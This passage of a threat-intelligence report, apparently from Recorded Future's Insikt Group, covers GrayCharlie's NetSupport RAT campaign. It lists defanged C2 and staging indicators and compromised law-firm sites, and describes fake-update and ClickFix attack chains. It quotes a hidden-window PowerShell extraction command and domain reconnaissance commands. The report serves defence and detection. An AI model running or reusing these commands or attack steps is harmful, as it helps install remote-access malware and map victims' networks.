            <div>194[.]180[.]191[.]171</div>
            <div>mar3</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]60</div>
            <div>mar1</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]17</div>
            <div>mar2</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]66</div>
            <div>apr2</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]81</div>
            <div>apr3</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>185[.]225[.]17[.]74</div>
            <div>apr4</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]189</div>
            <div>apr1</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>5[.]252[.]178[.]123</div>
            <div>may5</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]104</div>
            <div>may1</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]115</div>
            <div>may2</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]118</div>
            <div>may3</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]131</div>
            <div>may4</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]137</div>
            <div>may53</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]13</div>
            <div>june2</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]174</div>
            <div>june6</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]140</div>
            <div>june1</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]30</div>
            <div>june7</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]63</div>
            <div>june3</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]111</div>
            <div>june7</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]135</div>
            <div>june5ebatquot</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>5[.]252[.]178[.]23</div>
            <div>july9</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]41</div>
            <div>july1</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]61</div>
            <div>july3</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]73</div>
            <div>july4</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]87</div>
            <div>july6</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]97</div>
            <div>july8</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]130</div>
            <div>july9</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>NetSupport RAT C2 servers linked to Cluster 1 (Source: Recorded Future)</em></p>
        <p>Notably, the NetSupport RAT C2 servers in Cluster 1 are connected not only through the characteristics previously described, but also by the near-simultaneous creation of their TLS certificates. For example, the TLS certificate with the common name <code>june5ebatquot</code> associated with IP address <em>94[.]158[.]245[.]135</em> was generated on June 30, 2025 at 4:55:20 PM, while the certificate with the common name june6 linked to <em>94[.]158[.]245[.]174</em> was created only 20 seconds later.</p>
        <h5>Cluster 2</h5>
        <p>Cluster 2 comprises NetSupport RAT command-and-control servers whose TLS certificates typically start with two or more repetitions of “s”, followed by an “i” and a number (so “<code>sssi3</code>”, for example). NetSupport RAT samples linked to Cluster 2 used the license key <code>XMLCTL</code> and serial number <code>NSM303008</code>. The NetSupport RAT C2 servers typically also host an instance of the vulnerability scanner Acunetix. The C2 servers associated with this cluster are listed in <strong>Table 2</strong>. Notably, all TLS certificates associated with this cluster were created in a single batch on June 17, 2025.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>TLS Common Name</strong></div>
            <div><strong>License Key</strong></div>
            <div><strong>Serial Number</strong></div>
          </div>
          <div>
            <div>5[.]181[.]159[.]112</div>
            <div>sssi3</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]9</div>
            <div>ssi1</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]38</div>
            <div>sssi2</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]140</div>
            <div>ssssi6</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]143</div>
            <div>ssssi8</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]142</div>
            <div>sssssi7</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]139</div>
            <div>ssssi5</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
        </div>
        <p><em><strong>Table 2:</strong></em> <em>NetSupport RAT C2 servers linked to Cluster 2 (Source: Recorded Future)</em></p>
        <p>Of note, one NetSupport RAT C2 server (<em>94[.]158[.]245[.]56</em>) used a TLS certificate with the common name 23sss, created in May 2025, and was linked to a NetSupport RAT sample that carried the same license key (<code>EVALUSION</code>) and serial number (<code>NSM165348</code>) previously observed in Cluster 1.</p>
        <h5>Other NetSupport RAT C2 Servers</h5>
        <p>Insikt Group identified an additional set of NetSupport RAT C2 servers linked to GrayCharlie that did not form a distinct cluster (see <strong>Table 3</strong>). However, all the servers were hosted by MivoCloud and were associated with NetSupport RAT samples using license key and serial number combinations observed in Clusters 1 and 2.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>TLS Common Name</strong></div>
            <div><strong>License Key</strong></div>
            <div><strong>Serial Number</strong></div>
          </div>
          <div>
            <div>5[.]181[.]159[.]29</div>
            <div>ssdecservicsdes</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]18</div>
            <div>papichssd2</div>
            <div>DCVTTTUUEEW2</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]153</div>
            <div>kosmo2</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>94[.]158[.]245[.]170</div>
            <div>normvork</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]159[.]62</div>
            <div>ffdds</div>
            <div>DCVTTTUUEEW23</div>
            <div>NSM896597</div>
          </div>
          <div>
            <div>5[.]181[.]156[.]234</div>
            <div>wedn1</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]252[.]178[.]35</div>
            <div>scgs234123</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]209</div>
            <div>novemsdf</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]181[.]156[.]244</div>
            <div>wends4</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>194[.]180[.]191[.]121</div>
            <div>novaksuur</div>
            <div>EVALUSION</div>
            <div>NSM165348</div>
          </div>
          <div>
            <div>5[.]252[.]177[.]120</div>
            <div>lohsd</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>5[.]252[.]177[.]15</div>
            <div>bounce</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
          <div>
            <div>185[.]163[.]45[.]16</div>
            <div>update1</div>
            <div>XMLCTL</div>
            <div>NSM303008</div>
          </div>
        </div>
        <p><em><strong>Table 3:</strong></em> <em>Additional NetSupport RAT C2 servers linked to GrayBravo (Source: Recorded Future)</em></p>
        <h4>Staging Infrastructure</h4>
        <p>Once GrayCharlie victims land on the compromised WordPress sites, thereby satisfying the conditional logic, the payload is typically fetched from the attacker-controlled infrastructure and injected into the compromised WordPress sites. Insikt Group has identified two distinct types of staging infrastructure, each characterized by different website templates. Type 1 is modeled after “Wiser University,” and Type 2 is modeled after “Activitar.”</p>
        <h5>Type 1: “Wiser University”</h5>
        <p>The IP addresses associated with the Type 1 staging infrastructure are linked to websites impersonating “Wiser University” (see <strong>Figure 2</strong>), a fictional entity used to demonstrate Wiser, a free Bootstrap HTML5 education <a href="https://themewagon.com/themes/free-bootstrap-4-html5-education-website-template-wiser/">website template</a> for school, college, and university websites. (As a sidenote, Oreshnik is the name of a Russian intermediate-range ballistic missile reportedly capable of speeds exceeding Mach 10.) <strong>Appendix B</strong> lists the IP addresses associated with the Type 1 staging infrastructure. All IP addresses, except for one, are announced by AS202015 (HZ Hosting Ltd).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1500e0d2021b91244c59d04e70097054a1c748693.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Website impersonating “Wiser University” (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h6>Suspected Testing Infrastructure</h6>
        <p>Although most IP addresses associated with the Type 1 staging infrastructure are announced by AS202015, as shown in <strong>Appendix B</strong>, Insikt Group also identified a small subset announced by other ASNs that host the same websites (see <strong>Table 4</strong>). On average, approximately one such IP address appears to be established each month. Notably, most of these IP addresses appear to geolocate to Russia, and the same ASNs are consistently reused within the same timeframe.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
            <div><strong>Country</strong></div>
            <div><strong>Date of Emergence</strong></div>
          </div>
          <div>
            <div>89[.]253[.]222[.]25</div>
            <div>AS41535</div>
            <div>RU</div>
            <div>2025-08-29</div>
          </div>
          <div>
            <div>89[.]253[.]222[.]156</div>
            <div>AS41535</div>
            <div>RU</div>
            <div>2025-08-26</div>
          </div>
          <div>
            <div>89[.]169[.]12[.]48</div>
            <div>AS207957</div>
            <div>GB</div>
            <div>2025-07-08</div>
          </div>
          <div>
            <div>185[.]231[.]245[.]158</div>
            <div>AS202984</div>
            <div>RU</div>
            <div>2025-06-27</div>
          </div>
          <div>
            <div>95[.]182[.]123[.]86</div>
            <div>AS202984</div>
            <div>RU</div>
            <div>2025-05-19</div>
          </div>
          <div>
            <div>23[.]140[.]40[.]66</div>
            <div>AS61400</div>
            <div>RU</div>
            <div>2025-04-11</div>
          </div>
          <div>
            <div>217[.]114[.]15[.]253</div>
            <div>AS198610</div>
            <div>RU</div>
            <div>2025-04-09</div>
          </div>
          <div>
            <div>45[.]153[.]191[.]245</div>
            <div>AS198610</div>
            <div>RU</div>
            <div>2025-03-21</div>
          </div>
          <div>
            <div>46[.]29[.]163[.]28</div>
            <div>AS51659</div>
            <div>RU</div>
            <div>2025-02-06</div>
          </div>
        </div>
        <p><em><strong>Table 4:</strong></em> <em>Additional infrastructure possibly linked to GrayCharlie (Source: Recorded Future)</em></p>
        <h5>Type 2: “Activitar”</h5>
        <p>Insikt Group identified an additional set of staging infrastructure, referred to as “Type 2.” The IP addresses in this cluster commonly host specific websites (see <strong>Figure 3</strong>). Insikt Group assesses that this template was sourced elsewhere and is not unique to GrayCharlie.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1156a61a7697db00d450ae4f44a3a4252c377b599.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Website impersonating “Activitar” (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>A subset of domains and IP addresses associated with Type 2 is presented in <strong>Table 5</strong>. Notably, most of the IP addresses are also announced by AS202015 (HZ Hosting Ltd), and one domain in <strong>Table 5</strong>, <em>filmlerzltyazilimsx[.]shop</em>, is linked to the email address <em>oreshnik[@]mailum[.]com</em> through its WHOIS record.</p>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
          </div>
          <div>
            <div>filmlerzltyazilimsx[.]shop</div>
            <div>79[.]141[.]163[.]169</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>foolowme[.]com</div>
            <div>144[.]172[.]115[.]211</div>
            <div>AS14956</div>
          </div>
          <div>
            <div>joiner[.]best</div>
            <div>79[.]141[.]162[.]135</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>lowi1[.]com</div>
            <div>185[.]33[.]86[.]11</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>morniksell[.]com</div>
            <div>172[.]86[.]90[.]84</div>
            <div>AS14956</div>
          </div>
          <div>
            <div>persistancejs[.]store</div>
            <div>185[.]80[.]53[.]79</div>
            <div>AS59711</div>
          </div>
          <div>
            <div>pomofight[.]com</div>
            <div>45[.]61[.]134[.]76</div>
            <div>AS14956</div>
          </div>
          <div>
            <div>port4loms[.]com</div>
            <div>194[.]15[.]216[.]118</div>
            <div>AS197155</div>
          </div>
          <div>
            <div>signaturepl[.]com</div>
            <div>77[.]83[.]199[.]162</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>yungask[.]com</div>
            <div>91[.]193[.]19[.]220</div>
            <div>AS202015</div>
          </div>
        </div>
        <p><em><strong>Table 5:</strong></em> <em>Domains and IP addresses linked to Type 2 staging infrastructure (Source: Recorded Future)</em></p>
        <h4>Compromised Infrastructure</h4>
        <p>GrayCharlie commonly injects malicious scripts into the Document Object Model (DOM) of compromised WordPress sites using script tags. Insikt Group has identified several recurring URL patterns tied to this activity: some URLs load externally hosted JavaScript files (such as <em>hxxps://joiner[.]best/work/original[.]js</em>), while others call a PHP file on specific endpoints <a href="https://urlscan.io/result/0199e8a3-1d07-76d2-9ccb-39ea171d3744/dom">using</a> an ID parameter (such as <em>hxxps://signaturepl[.]com/work/index[.]php?abje2LAw</em>). Notably, these URLs are updated over time by the threat actor, complicating detection and indicating the threat actor maintains ongoing access to a large pool of compromised WordPress installations. <strong>Appendix A</strong> lists a subset of WordPress websites infected by GrayCharlie.</p>
        <p>Although the exact initial access vector is unknown, it is likely that the actors either purchase access, such as via malware logs containing WordPress admin credentials, or exploit vulnerable WordPress plugins. The latter <a href="https://www.wp-1click.com/blog/how-hackers-target-wordpress-sites/">remains</a> the most frequent cause of all WordPress compromises.</p>
        <h4><strong>Suspected Compromise of “Law Firm Acceleration Company” SMB Team</strong></h4>
        <p>While the GrayCharlie-linked compromised WordPress sites span a wide range of industry verticals, in a few rare instances, the threat actors appear to have obtained, either through their own intrusions or via a third party, a more targeted set of WordPress domains. Specifically, at least fifteen websites belonging to US law firms were observed loading the external JavaScript hosted at <em>hxxps://persistancejs[.]store/work/original[.]js</em> (see <strong>Table 6</strong>).</p>
        <p>Insikt Group assesses that GrayCharlie (or the third party GrayCharlie works with) likely compromised these websites through a supply-chain vector. One potential avenue is SMB Team, the self-described “fastest-growing law firm acceleration company,” which has supported thousands of firms across North America, according to its website, as its logo and other references appear across many of the websites listed in <strong>Table 6</strong> (see <strong>Figure 4</strong>). Notably, credentials associated with an SMB Team email address used for a WordPress hosting platform surfaced around the same time that the domain <em>persistancejs[.]store</em> first began resolving. This temporal overlap suggests that the threat actors may have gained access to SMB Team-related infrastructure through the use of legitimate, compromised credentials.</p>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>Company</strong></div>
            <div><strong>Country</strong></div>
            <div><strong>SMB Team</strong></div>
          </div>
          <div>
            <div>bianchilawgroup[.]com</div>
            <div>Bianchi Law Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>brattonlawgroup[.]com</div>
            <div>Bratton Law Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>brighterdaylaw[.]com</div>
            <div>Brighter Day Law</div>
            <div>US</div>
            <div>N/A</div>
          </div>
          <div>
            <div>defensegroup[.]com</div>
            <div>The Defense Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>dwicriminallawcenter[.]com</div>
            <div>Benjamin Law Firm LLC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>fisherstonelaw[.]com</div>
            <div>Fisher Stone, P.C.</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>jarrettfirm[.]com</div>
            <div>Jarrett &amp; Price LLC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>raineyandrainey[.]com</div>
            <div>Rainey &amp; Rainey Attorneys At Law PLLC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>rbbfirm[.]com</div>
            <div>Buchanan Law Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>rmvlawyer[.]com</div>
            <div>The Law Office of Brian Simoneau, P.C.</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]brentadams[.]com</div>
            <div>Brent Adams &amp; Associates</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]cfblaw[.]com</div>
            <div>Cohen Forman Barone, PC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]gerlinglaw[.]com</div>
            <div>Gerling Law Injury Attorneys</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]immigration-defense[.]com</div>
            <div>Law Offices of Daniel Shanfield</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]schwartzandschwartz[.]com</div>
            <div>Schwartz &amp; Schwartz Attorneys at Law, P.A.</div>
            <div>US</div>
            <div>N/A</div>
          </div>
        </div>
        <p><em><strong>Table 6:</strong></em> <em>Compromised law firm websites linked to GrayCharlie (Source: Recorded Future)</em></p>
        <div>
          <div>
            <div>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_18fd20865333f5d84a84b457d80ddd430d382877b.png?width=750&amp;format=png&amp;optimize=medium" width="1588" height="830" />
              </p>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1ebd43f461510a56badf377e44049eaf90555a74a.png?width=750&amp;format=png&amp;optimize=medium" width="430" height="117" />
              </p>
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>Website of Gerling Law Injury Attorneys (top) and SMBTeam logo (bottom) (Source:</em> <em><a href="https://urlscan.io/result/019b035c-aed8-73a6-8f38-60388c596fb6">URLScan</a>)</em></div>
          </div>
        </div>
        <p>Notably, while an SMB Team compromise is possible, Insikt Group also assesses that the actors may have exploited a specific version of WordPress or its plugins used by SMB Team, which could explain the simultaneous compromise of all affected websites.</p>
        <p>In some instances, the same compromised WordPress sites are compromised by multiple threat actors simultaneously. For example, <em>bianchilawgroup[.]com</em> was also breached by TAG-124 (also known as LandUpdate808 or Kongtuke) since at least December 2025, which <a href="https://urlscan.io/result/019b027f-5214-74ff-b1e3-efec9160620d/dom">used</a> the domain <em>vimsltd[.]com</em>.</p>
        <h4>Higher-Tier Analysis</h4>
        <p>GrayCharlie administers its staging infrastructure primarily over SSH, though other ports are used intermittently. The group manages its NetSupport RAT C2 servers over TCP port 443. Overall, Insikt Group assesses that GrayCharlie relies extensively on proxy services to administer its infrastructure. Additionally, based on presumed browsing activity from higher-tier servers, at least some individuals linked to GrayCharlie are assessed to be Russian-speaking.</p>
        <h3>Attack-Chain Analysis</h3>
        <p>GrayCharlie has been observed using two different attack chains to deliver NetSupport RAT. The first chain uses compromised websites to distribute a fake browser update that triggers the retrieval and installation of a script-based payload; the second chain uses compromised WordPress sites and a ClickFix-style lure that copies a command to fetch and install the RAT. Both culminate in NetSupport execution from <code>%AppData%</code>, Registry Run key persistence, and C2 connectivity; the technical details are expanded below.</p>
        <h4>Attack Chain 1: Fake Browser Update Leading to NetSupport RAT</h4>
        <p>According to public reporting, when GrayCharlie first <a href="https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates">became</a> active in mid-2023, it <a href="https://www.threatdown.com/blog/smartapesg-06-11-2024/">relied</a> on fake browser updates to deliver the NetSupport RAT. Although the group later shifted to the ClickFix technique, Insikt Group <a href="https://infosec.exchange/@monitorsg/115363334718836118">observed</a> a return to fake browser updates as early as October 12, 2025. <strong>Figure 5</strong> provides an overview of Attack Chain 1.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1ca8e19bb49da0d1924539da6e91ae9ddaf6d3227.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="475" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 5:</strong></em> <em>Attack Chain 1 (Source: Recorded Future)</em></div>
          </div>
        </div>
        <ol>
          <li><strong>Website compromise and lure delivery</strong>. Threat actors modify legitimate sites to load malicious scripts that render a browser-specific “update” prompt. Selecting the prompt initiates download of a ZIP “update” package containing a primary JavaScript file alongside decoy <code>.dat</code> files.</li>
          <li><strong>User-executed JavaScript loader</strong>. The victim manually runs the <code>.js</code> script. The script mimics a benign browser component to reduce suspicion while silently initiating the next stage of the attack.</li>
          <li><strong>PowerShell staging via WScript</strong>. The JavaScript launches <code>wscript.exe</code>, which spawns <code>powershell.exe</code>. PowerShell reaches out to a remote host to fetch an obfuscated JavaScript containing encoded tasking.</li>
          <li><strong>Secondary payload retrieval</strong>. PowerShell decodes instructions and downloads the actual payload ZIP archive. This archive contains a complete NetSupport RAT client set, including <code>client32.exe</code> and required DLLs.</li>
          <li><strong>File deployment and execution</strong>. The archive is extracted under the user profile (for example, <code>%AppData%\Roaming\...</code>). <code>client32.exe</code> is started in the background to minimize visible indicators to the user.</li>
          <li><strong>Persistence establishment</strong>. A Windows Run registry key is created to automatically launch <code>client32.exe</code> at logon, ensuring the NetSupport RAT remains active after reboots without requiring further user interaction.</li>
          <li><strong>C2 readiness</strong>. With the NetSupport RAT client running on the infected host, the endpoint is prepared to establish command-and-control connectivity with the attacker's infrastructure.</li>
        </ol>
        <h4>Attack Chain 2: WordPress Redirects and ClickFix Leading to NetSupport RAT</h4>
        <p>As early as April 2025, GrayCharlie <a href="https://www.cybereason.com/blog/net-support-rat-wordpress-clickfix">began</a> using ClickFix as a secondary attack chain, consistent with industry reporting that many threat actors have adopted ClickFix techniques due to their effectiveness. <strong>Figure 6</strong> provides an overview of Attack Chain 2.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1ae1c0d8952cb5c0f7b8157e5acfe6511630de60c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="618" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 6:</strong></em> <em>Attack Chain 2 (Source: Recorded Future)</em></div>
          </div>
        </div>
        <ol>
          <li><strong>Initial delivery and redirection.</strong> Phishing emails, malicious PDFs, or links on gaming sites direct users to compromised WordPress pages that embed attacker JavaScript.</li>
          <li><strong>Background script and profiling.</strong> A background script loads when the site is visited, injects an iframe, and profiles the environment (such as the operating system and browser) to deliver the next stage.</li>
          <li><strong>ClickFix fake CAPTCHA.</strong> The page presents a fake CAPTCHA that quietly copies a malicious command to the user’s clipboard and instructs them to paste it into the Windows Run dialog (Win+R), turning social engineering into user-assisted execution (see <strong>Figure 7</strong>).</li>
        </ol>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1f878a544b5193108d0dd7bc5d1359a3487d5a705.png?width=750&amp;format=png&amp;optimize=medium" width="509" height="392" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 7:</strong></em> <em>Fake Captcha (Source:</em> <em><a href="https://www.elastic.co/security-labs/a-wretch-client">Elastic</a>)</em></div>
          </div>
        </div>
        <ol>
          <li><strong>Command-driven staging.</strong> The pasted command retrieves a batch file that downloads a ZIP containing NetSupport RAT and uses PowerShell to extract it into <code>%AppData%\Roaming\</code> (see <strong>Figure 8</strong>).</li>
        </ol>
        <div>
          <div>
            <div><code>powershell -Win^dow Style Hidden -Command "Add-Type -AssemblyName 'System. IO.Compression FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('!CF0JOAXML!','!WFHEYHKMZ!')"</code></div>
          </div>
        </div>
        <p><em><strong>Figure 8:</strong></em> <em>PowerShell command (Source:</em> <em><a href="https://www.cybereason.com/blog/net-support-rat-wordpress-clickfix">Cybereason</a>)</em></p>
        <ol>
          <li><strong>NetSupport RAT launch and persistence.</strong> The batch file starts <code>client32.exe</code> and sets a Run registry key to automatically relaunch the NetSupport RAT client at startup, establishing persistence on the endpoint.</li>
          <li><strong>Remote access and follow-on actions.</strong> Once connected to C2, operators can interact with the system, perform reconnaissance (for example, domain group membership queries), transfer files, execute additional commands, and potentially move laterally using access acquired from the host.</li>
        </ol>
        <h3>Observed Operator Activity</h3>
        <p>In October 2025, Insikt Group detonated a NetSupport RAT sample (SHA256: 31804c48f9294c9fa7c165c89e487bfbebeda6daf3244ad30b93122bf933c79c) with the C2 server <em>5[.]181[.]156[.]234[:]443</em> linked to GrayCharlie within a controlled environment. Later that day, approximately three hours later, the threat actor connected using NetSupport RAT, compressed and moved two files, and then executed group and account reconnaissance commands. The same actor returned three days later and repeated the previously observed reconnaissance commands (see <strong>Figure 9</strong>).</p>
        <div>
          <div>
            <div>
              <pre><code>net group /domain "Domain COmputers"
C:\Windows\system32\net1 group /domain "Domain COmputers"
</code></pre>
            </div>
          </div>
        </div>
        <p><em><strong>Figure 9:</strong></em> <em>Reconnaissance commands (Source: Recorded Future)</em></p>
        <p>When both files were compressed into a single ZIP archive and the executable was detonated, the process sideloaded a DLL identified as Sectop RAT (SHA256: 59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78) with the C2 server <em>85[.]158[.]110[.]179[:]15847</em>. The executable (SHA256: 5f1bd92ad6edea67762c7101cb810dc28fd861f7b8c62e6459226b7ea54e1428) was identified as “Merge XML Files”, version 1.2.0.0, developed by Vovsoft, and was signed with a digital certificate that expired on October 31, 2025.</p>
        <h2>Mitigations</h2>
        <ul>
          <li>Leverage the IoCs in <strong>Appendix A</strong> and <strong>Appendix B</strong> to investigate potential past or ongoing infections, both successful and attempted; Recorded Future customers can use the Recorded Future Intelligence Operations Platform to monitor for future IoCs associated with GrayCharlie.</li>
          <li>Monitor for validated infrastructure associated with the malware families discussed in this report, including NetSupport RAT and Stealc, as well as numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.</li>
          <li>Leverage the Sigma, YARA, and Snort rules provided in <strong>Appendices D</strong>, <strong>E</strong>, and <strong>F</strong> in your security information and event management (SIEM) or endpoint detection and response (EDR) tools to detect the presence or execution of NetSupport RAT. Customers can use additional detection rules available in the Recorded Future Intelligence Operations Platform.</li>
          <li>Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure.</li>
          <li>Use the Recorded Future Intelligence Operations Platform to monitor GrayCharlie, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.</li>
          <li>Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to your company. For example, if you want to stay informed about activities related to GrayCharlie, you can receive regular AI-generated updates on this threat actor.</li>
        </ul>
        <h2>Outlook</h2>
        <p>GrayCharlie has been operating for more than two years, and despite shifts in its tactics, such as alternating between fake updates and ClickFix techniques or transitioning from SmartApe to other hosting providers like MivoCloud, the group’s core behaviors have remained consistent. Given its sustained activity, GrayCharlie is highly likely to remain active and continue targeting organizations worldwide, with a current emphasis on US entities, as indicated by Recorded Future Network Intelligence.</p>
        <p>Insikt Group will continue to closely monitor GrayCharlie to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.</p>
        <h2>Appendix A: Indicators of Compromise</h2>
        <div>
          <div>
            <div>
              <pre><code>Cluster 1 NetSupport RAT C2 IP Addresses:
5[.]181[.]159[.]60
5[.]252[.]178[.]23
5[.]252[.]178[.]123
94[.]158[.]245[.]13
94[.]158[.]245[.]63
94[.]158[.]245[.]66
94[.]158[.]245[.]81
94[.]158[.]245[.]104
94[.]158[.]245[.]111
94[.]158[.]245[.]115
94[.]158[.]245[.]118
94[.]158[.]245[.]131
94[.]158[.]245[.]135
94[.]158[.]245[.]137
94[.]158[.]245[.]140
94[.]158[.]245[.]174
185[.]163[.]45[.]30
185[.]163[.]45[.]41
185[.]163[.]45[.]61
185[.]163[.]45[.]73
185[.]163[.]45[.]87
185[.]163[.]45[.]97
185[.]163[.]45[.]130
185[.]225[.]17[.]74
194[.]180[.]191[.]17
194[.]180[.]191[.]51
194[.]180[.]191[.]168
194[.]180[.]191[.]171
194[.]180[.]191[.]189

Cluster 2 NetSupport RAT C2 IP Addresses:
5[.]181[.]159[.]9
5[.]181[.]159[.]38
